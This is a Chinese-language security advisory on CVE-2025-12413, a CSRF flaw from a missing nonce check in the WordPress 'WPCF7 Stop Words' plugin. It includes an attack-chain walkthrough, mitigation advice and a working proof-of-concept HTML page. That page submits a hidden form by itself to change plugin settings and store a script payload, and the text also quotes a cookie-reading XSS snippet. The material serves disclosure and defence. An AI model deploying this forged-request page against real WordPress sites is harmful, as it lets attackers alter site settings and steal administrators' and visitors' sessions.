CVE-2025-12413 WordPress WPCF7 Stop Words插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-12413

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Social Media WPCF7 Stop Words plugin for WordPress

漏洞概述

Social Media WPCF7 Stop Words是WordPress的一个插件，用于处理联系表单7（Contact Form 7）中的敏感词过滤。该插件在1.1.3及之前的所有版本中存在严重的跨站请求伪造（CSRF）漏洞。漏洞根源在于smWpCfSwOptions()函数缺少正确的nonce验证机制，攻击者可以利用此漏洞构造恶意请求，诱骗已登录的管理员用户访问，从而在不知情的情况下修改插件设置。由于插件设置功能可能涉及前端脚本输出，攻击者最终可在网站前端注入恶意JavaScript代码，实现会话劫持、钓鱼攻击或进一步横向渗透。此漏洞无需认证即可发起攻击，但需要管理员用户进行交互操作（如点击链接），属于典型的社会工程学攻击向量。

技术细节

该漏洞存在于插件的选项更新功能中，具体位置为smWpCfSwOptions()函数。问题代码位于social-media-wpcf7-stop-words.php第45行附近，该函数直接处理用户提交的设置参数但未执行nonce令牌验证。在WordPress中，nonce是防止CSRF攻击的核心安全机制，它通过生成一次性令牌确保请求确实来自合法的管理员操作。攻击者可以构造一个包含恶意参数的表单或URL，当管理员访问时，浏览器会自动携带有效的认证Cookie发送请求，服务器因缺少nonce验证而接受这个伪造请求。攻击者可利用此漏洞修改插件配置，可能在保存的内容中注入XSS Payload，如<script>alert(document.cookie)</script>，当其他用户访问相关页面时恶意脚本将执行，导致会话cookie被盗或被用于进一步攻击。

攻击链分析

STEP 1

步骤1

攻击者创建恶意HTML页面，包含自动提交的表单，表单参数针对插件的smWpCfSwOptions()函数

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或其他方式诱导WordPress管理员访问恶意页面

STEP 3

步骤3

管理员浏览器自动向目标网站发送POST请求，由于浏览器会自动携带有效的认证Cookie

STEP 4

步骤4

目标服务器接收到请求，因缺少nonce验证，接受请求并更新插件设置

STEP 5

步骤5

恶意脚本（如XSS Payload）被保存到插件配置中，当其他用户访问相关页面时执行

STEP 6

步骤6

攻击者成功窃取用户会话Cookie、凭据或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-12413 -->
<!-- This PoC demonstrates the CSRF vulnerability in WPCF7 Stop Words plugin -->
<!-- When a logged-in admin visits this page, plugin settings will be modified -->

<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - CVE-2025-12413</title>
</head>
<body>
    <h1>CSRF Attack PoC for WPCF7 Stop Words Plugin</h1>
    <p>If you are logged in as WordPress admin, the following form will be submitted automatically.</p>
    
    <form action="http://target-site/wp-admin/admin-post.php" method="POST" id="csrf-form">
        <!-- Required WordPress admin-post.php parameters -->
        <input type="hidden" name="action" value="update">
        <input type="hidden" name="option_page" value="sm_wpcf_sw_options_group">
        
        <!-- Plugin settings that will be modified -->
        <input type="hidden" name="sm_wpcf_sw_stop_words" value="<script>alert('XSS via CSRF')</script>">
        <input type="hidden" name="sm_wpcf_sw_enabled" value="1">
        
        <!-- Submit button (auto-submit via JavaScript) -->
        <input type="submit" value="Submit">
    </form>
    
    <script>
        // Auto-submit the form after page load
        document.getElementById('csrf-form').submit();
        console.log('CSRF PoC submitted');
    </script>
    
    <p><strong>Note:</strong> This PoC is for educational and security testing purposes only.</p>
</body>
</html>

影响范围

Social Media WPCF7 Stop Words plugin <= 1.1.3

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1）暂时禁用或删除该插件；2）使用WordPress安全插件（如Wordfence）添加额外的CSRF保护层；3）教育管理员不要点击未知来源的链接；4）使用浏览器安全插件防护恶意表单自动提交；5）监控admin-post.php的异常请求；6）限制管理员访问后台的IP范围。建议持续关注插件官方更新，及时应用安全补丁。